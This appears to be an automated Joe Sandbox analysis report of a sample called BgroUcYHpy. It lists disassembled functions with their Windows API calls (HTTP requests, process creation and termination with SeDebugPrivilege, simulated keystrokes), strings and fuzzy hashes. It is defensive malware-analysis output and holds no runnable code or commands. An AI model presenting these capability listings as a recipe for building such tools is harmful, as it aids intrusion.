Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,.$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-1389923024
Opcode ID: d301857a0e7aff073f0388d3ba582f9d0db06e4854f2598dd26fd367be76793f
Instruction ID: 1822d00da2da327aea7034cbd5aabbb83db44800693f26be701b49371fb0c6ae
Opcode Fuzzy Hash: d301857a0e7aff073f0388d3ba582f9d0db06e4854f2598dd26fd367be76793f
Instruction Fuzzy Hash: 3F918F71A20216EBDF24DFA5C848FAEB7B8EF45710F10825DF915AB280D7709995CFA0

Function 002AA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,002AA439), ref: 002AA377

Strings

TEXT, xrefs: 002AA2AE
CLASS, xrefs: 002AA0F6
NAME, xrefs: 002AA1A9
INSTANCE, xrefs: 002AA285
REGEXPCLASS, xrefs: 002AA13C
CLASSNN, xrefs: 002AA119

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: b099071cca02a6dec9cf3b80c4350d9c3d1cba17a798a393e2d8a1bd72363889
Instruction ID: 2df1ab82a9bca1efda9e6450aee286ed4b0e8cacc0480122ab1d288493ae7301
Opcode Fuzzy Hash: b099071cca02a6dec9cf3b80c4350d9c3d1cba17a798a393e2d8a1bd72363889
Instruction Fuzzy Hash: 3291A630920606EBCB09DFA0C492BEEFB74BF05300F548119D959A7191DF7169B9DFA1

Function 00252E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00252EAE

Part of subcall function 00251DB3: GetClientRect.USER32(?,?), ref: 00251DDC
Part of subcall function 00251DB3: GetWindowRect.USER32(?,?), ref: 00251E1D
Part of subcall function 00251DB3: ScreenToClient.USER32(?,?), ref: 00251E45

GetDC.USER32 ref: 0028CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0028CD45
SelectObject.GDI32(00000000,00000000), ref: 0028CD53
SelectObject.GDI32(00000000,00000000), ref: 0028CD68
ReleaseDC.USER32(?,00000000), ref: 0028CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0028CDFB

Strings

U, xrefs: 0028CCD0

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 8a7add4a2181444a99adf9f7913cc0daea4abd046e10cd5ae3defae8b71e9c82
Instruction ID: c341f52e1e3c86e00da2b5f04ce672f738478b2186f3ab4bbdf50913904dc419
Opcode Fuzzy Hash: 8a7add4a2181444a99adf9f7913cc0daea4abd046e10cd5ae3defae8b71e9c82
Instruction Fuzzy Hash: 0A710335421206DFCF21AF64C885AEA3BB5FF49321F24827AED555A2E6C7309C64DF60

Function 002C1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002C1A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002C1A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 002C1ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002C1AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002C1AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002C1B10
InternetCloseHandle.WININET(00000000), ref: 002C1B57

Part of subcall function 002C2483: GetLastError.KERNEL32(?,?,002C1817,00000000,00000000,00000001), ref: 002C2498
Part of subcall function 002C2483: SetEvent.KERNEL32(?,?,002C1817,00000000,00000000,00000001), ref: 002C24AD

Strings

, xrefs: 002C1B01

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 572493ab8e910bd857dd30b834a69da3142f705069e05d3e29031fc62ddf8f1d
Instruction ID: ae6e8e18138945254cd545c0ebe5cb009759f3c2028c801aeb3b8bf8304cb5a1
Opcode Fuzzy Hash: 572493ab8e910bd857dd30b834a69da3142f705069e05d3e29031fc62ddf8f1d
Instruction Fuzzy Hash: 684171B1911219BFEB119F50CC8AFFA77ACEF09354F04422AF9059A141EB709E649BA4

Function 002C8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,002DF910), ref: 002C8D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,002DF910), ref: 002C8D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002C8ED6
SysFreeString.OLEAUT32(?), ref: 002C8F00

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 92bd456f62f7de817cc9dad5d700982106f8dd667e140a564ae6b1069b422d2e
Instruction ID: d5dc4f6537e10afbf1afb2051a69e5747397f920e08582e75bdd08edce68c41c
Opcode Fuzzy Hash: 92bd456f62f7de817cc9dad5d700982106f8dd667e140a564ae6b1069b422d2e
Instruction Fuzzy Hash: D3F14971A10209EFCB04DF94C888EAEB7B9FF45315F108598F906AB251DB71AE95CF60

Function 002CF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002CF6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CF848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CF86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CF8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CF8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002CFA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002CFA7C
CloseHandle.KERNEL32(?), ref: 002CFAAB
CloseHandle.KERNEL32(?), ref: 002CFB22

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: ac51b682ff1f1fe696f63f77d30d779a301d91b02e6aa4f536a69159685ae3f7
Instruction ID: 2403f9567f072a0ec8e29d77e1c0907fa43f3e25022aa90defa9920eebdbf885
Opcode Fuzzy Hash: ac51b682ff1f1fe696f63f77d30d779a301d91b02e6aa4f536a69159685ae3f7
Instruction Fuzzy Hash: 3BE1AF31624201DFCB54EF24C991F6ABBE1AF89354F148A6DF8998B2A1CB30DC55CF52

Function 002B4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 002B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002B3697,?), ref: 002B468B

Part of subcall function 002B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002B3697,?), ref: 002B46A4

Part of subcall function 002B4A31: GetFileAttributesW.KERNEL32(?,002B370B), ref: 002B4A32

lstrcmpiW.KERNEL32(?,?), ref: 002B4D40
_wcscmp.LIBCMT ref: 002B4D5A
MoveFileW.KERNEL32(?,?), ref: 002B4D75

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 8669314bc19098f7fadb5207caad431675e80235ab07fc9fb513c27cea909a60
Instruction ID: dc66de7d3ca52bf481eaeaee238ac98760a74a865105bf21fdec7eb1910fd7d6
Opcode Fuzzy Hash: 8669314bc19098f7fadb5207caad431675e80235ab07fc9fb513c27cea909a60
Instruction Fuzzy Hash: 8F5175B24183459BC724EF60D8919EFB3ECAF85350F00492EF589D3152EF74A698CB56

Function 002D8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002D86FF

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 852d626bb08e57688abfdf46d8f29e0e96928eb2075f8b48aeb129faa896378e
Instruction ID: 191e7bbfc60e44affab1e5ada6c7ec0445a4a734c64232edf5e199dcf6a96805
Opcode Fuzzy Hash: 852d626bb08e57688abfdf46d8f29e0e96928eb2075f8b48aeb129faa896378e
Instruction Fuzzy Hash: AE51A134620245BEEB209F28DC89FAD7B69EB05320F604153F951E63E0CB71EDA0DB85

Function 00252B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0028C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0028C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0028C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0028C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0028C370
DestroyIcon.USER32(00000000), ref: 0028C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0028C39C
DestroyIcon.USER32(?), ref: 0028C3AB

Part of subcall function 002DA4AF: DeleteObject.GDI32(00000000), ref: 002DA4E8

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 755a37149a1f35fcbb787640b991b88d59615908858cc5489265c6f0eb3e157b
Instruction ID: 9d70a885e2b852b673e59cc0f985c6a2d19aac3f72f3888c405183b9ad021e51
Opcode Fuzzy Hash: 755a37149a1f35fcbb787640b991b88d59615908858cc5489265c6f0eb3e157b
Instruction Fuzzy Hash: 6351AB74A21206EFDB20EF24DC45FAA77A9EB49311F104529F902972E0D7B0ECA5DB64

Function 002A966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 002AA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 002AA84C
Part of subcall function 002AA82C: GetCurrentThreadId.KERNEL32 ref: 002AA853
Part of subcall function 002AA82C: AttachThreadInput.USER32(00000000,?,002A9683,?,00000001), ref: 002AA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 002A968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002A96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 002A96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 002A96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002A96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002A96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 002A96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002A96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002A96FB

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 5deab1815638dc40b40258bc1942756301c95804b0d343491a247647a17ac98e
Instruction ID: 6d226f227255975335ed7377e76848914e4ac5c1f409134c59c0ed99f67153a8
Opcode Fuzzy Hash: 5deab1815638dc40b40258bc1942756301c95804b0d343491a247647a17ac98e
Instruction Fuzzy Hash: EB11C271910218BFF6106B61AC4DF6A7B1DDF4D750F100426F655AB0A0C9F29C50DAA8

Function 002A8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,002A853C,00000B00,?,?), ref: 002A892A
HeapAlloc.KERNEL32(00000000,?,002A853C,00000B00,?,?), ref: 002A8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002A853C,00000B00,?,?), ref: 002A8946
GetCurrentProcess.KERNEL32(?,00000000,?,002A853C,00000B00,?,?), ref: 002A894E
DuplicateHandle.KERNEL32(00000000,?,002A853C,00000B00,?,?), ref: 002A8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,002A853C,00000B00,?,?), ref: 002A8961
GetCurrentProcess.KERNEL32(002A853C,00000000,?,002A853C,00000B00,?,?), ref: 002A8969
DuplicateHandle.KERNEL32(00000000,?,002A853C,00000B00,?,?), ref: 002A896C
CreateThread.KERNEL32(00000000,00000000,002A8992,00000000,00000000,00000000), ref: 002A8986

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 5838325f1fb1cced0414245c542c6aca419f9fe11e1b69494ec56a4f22981ccd
Instruction ID: 3dfa093b84874a979c732c975b5b795382fda15e7fd8a7d1311de21fcdbbe738
Opcode Fuzzy Hash: 5838325f1fb1cced0414245c542c6aca419f9fe11e1b69494ec56a4f22981ccd
Instruction Fuzzy Hash: 0C01AC75641344FFE650ABA5ED4DF673B6CEB89711F408421FA09DB1A1CA70DC008A24

Function 002C9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 002C9BA4, 002C9EC8
Not an Object type, xrefs: 002C9B7B

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 582bebcd469bf368d50a20965037c9334485df26dce11421c5843babdfb7dafa
Instruction ID: f597d305f8f7818b69b93a91894f3d469fd428a77e46a28a8f5d6a228c11fa9f
Opcode Fuzzy Hash: 582bebcd469bf368d50a20965037c9334485df26dce11421c5843babdfb7dafa
Instruction Fuzzy Hash: 40C19171A1020A9FDF10DF98D888FAEB7F5BF58314F15856EE905A7280E7709D90CB90

Function 002C975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 002A710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?,?,002A7455), ref: 002A7127
Part of subcall function 002A710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A7142
Part of subcall function 002A710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A7150
Part of subcall function 002A710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?), ref: 002A7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 002C9806
_memset.LIBCMT ref: 002C9813
_memset.LIBCMT ref: 002C9956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 002C9982
CoTaskMemFree.OLE32(?), ref: 002C998D

Strings

NULL Pointer assignment, xrefs: 002C99DB

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 41959c2d8a7f0b2bbda4b0b5e83448aa3b831e3aaa39d7fbd1f74af2d9ec26ee
Instruction ID: 013a0d7aa72a0fe139255b8640951696c6e7ff63a8ca923a5cfcb68fc4a31a58
Opcode Fuzzy Hash: 41959c2d8a7f0b2bbda4b0b5e83448aa3b831e3aaa39d7fbd1f74af2d9ec26ee
Instruction Fuzzy Hash: 62914871D10229EBDB10DFA5DC44EDEBBB9EF08310F20415AF819A7291DB719A54CFA0

Function 002D6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002D6E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 002D6E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002D6E52
_wcscat.LIBCMT ref: 002D6EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 002D6EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 002D6EF2

Strings

SysListView32, xrefs: 002D6DF6

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 6f121051919d465626e0716eab651159a34240e4704f6856fb0ce62e6590515a
Instruction ID: 651316155ec59f9393e2fefa1924c419641d749ca19ab11beec5563bb71d2254
Opcode Fuzzy Hash: 6f121051919d465626e0716eab651159a34240e4704f6856fb0ce62e6590515a
Instruction Fuzzy Hash: FF41BD71A10309EFEB21DF64DC89FEA77A9EF08350F10442BF585A72D1D6729DA48B60

Function 002CE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 002B3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 002B3C7A
Part of subcall function 002B3C55: Process32FirstW.KERNEL32(00000000,?), ref: 002B3C88
Part of subcall function 002B3C55: CloseHandle.KERNEL32(00000000), ref: 002B3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CE9A4
GetLastError.KERNEL32 ref: 002CE9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CE9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 002CEA63
GetLastError.KERNEL32(00000000), ref: 002CEA6E
CloseHandle.KERNEL32(00000000), ref: 002CEAA3

Strings

SeDebugPrivilege, xrefs: 002CE9C2

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 325d59870d29ff5ebc84fc52a98528173b2b88f73a04ee6adf8c3d9737f7bd68
Instruction ID: 8fe8628a841c90769abf8b65f1a98fc7d2dd2ba795d8ae6007f837a26cb6633d
Opcode Fuzzy Hash: 325d59870d29ff5ebc84fc52a98528173b2b88f73a04ee6adf8c3d9737f7bd68
Instruction Fuzzy Hash: D241A8716202019FDB10EF24DC99F6EBBA5AF40310F19855DF9069B2C2CBB1AD68CF95

Function 002B2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 002B3033

Strings

question, xrefs: 002B2FEC
blank, xrefs: 002B2FB5
warning, xrefs: 002B301C
info, xrefs: 002B2FD4
stop, xrefs: 002B3004

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

